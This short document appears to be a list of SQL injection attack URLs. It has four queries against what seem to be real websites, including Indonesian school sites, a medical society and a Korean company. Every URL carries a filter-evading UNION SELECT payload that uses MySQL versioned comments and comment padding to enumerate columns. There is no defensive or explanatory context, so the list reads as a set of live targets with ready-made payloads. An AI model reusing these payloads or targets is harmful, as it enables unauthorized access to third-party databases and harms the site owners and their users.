Query: http://sman1giri.sch.id/news/read/?news=2770151%27/**8**/and/**8**/mod(9,9)/**8**//*!50000union*//**8**//*!50000select*//**8**/1,2,3,4,5,6,7,8,9,10,11,12,13,14--+
Query: http://musculoskeletalsociety.in/page.php?id=5/**8**/and/**8**/mod(9,9)/**8**//*!50000union*//**8**//*!50000select*//**8**/1,2,3,4,5--+
Query: https://mtsn9nganjuk.sch.id/info_lulus/cetaksk.php?noujian=22-005-23-0548-0001-8%27/**8**/and/**8**/mod(9,9)/**8**//*!50000union*//**8**//*!50000select*//**8**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--+
Query: http://www.sepakorea.com/eng/home.php?go=Dmenu_04&num=903/**8**/and/**8**/mod(9,9)/**8**//*!50000union*//**8**//*!50000select*//**8**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--+
